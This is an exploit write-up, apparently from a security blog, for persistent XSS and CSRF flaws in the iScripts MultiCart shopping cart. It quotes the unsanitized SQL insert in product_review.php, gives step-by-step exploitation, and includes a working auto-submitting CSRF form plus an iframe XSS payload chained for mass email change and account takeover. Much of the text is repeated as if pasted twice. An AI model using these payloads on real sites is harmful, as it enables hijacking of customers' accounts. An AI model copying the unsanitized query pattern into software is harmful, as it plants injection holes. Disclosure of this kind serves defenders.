# Exploit Title : iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site Scripting
iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.
XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS
mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
$_POST['txtReview'] is inserted without sanitizing.
Exploitation
Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.
XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.
# Cross-site request forgery
# XSS+CSRF Mass Email Change /Mass Account Takeover
XSS+CSRF can be used to change mass user email , after changing the email we can change the password too via forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit
So now whenever user browse different products their useremail will be changed automatically.
#Independent Pakistani Security Researcher
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site Scripting
iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.
XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS
mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
$_POST['txtReview'] is inserted without sanitizing.
Exploitation
Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.
XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.
# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex"action="http://localhost/profile.php" method=post >
<input type=hidden size=30 maxlength=30 name=userid value="5">
<input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
<input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
<input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">
<input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
<input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
<input type=submit name=btnSaveChanges class=button value='Save'>
</form>
</html>
# XSS+CSRF Mass Email Change /Mass Account Takeover
XSS+CSRF can be used to change mass user email , after changing the email we can change the password too via forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit
So now whenever user browse different products their useremail will be changed automatically.
#Independent Pakistani Security Researcher
1 comments:
I have to state with respect to this article. I really like and appreciate your work.
Paris
Post a Comment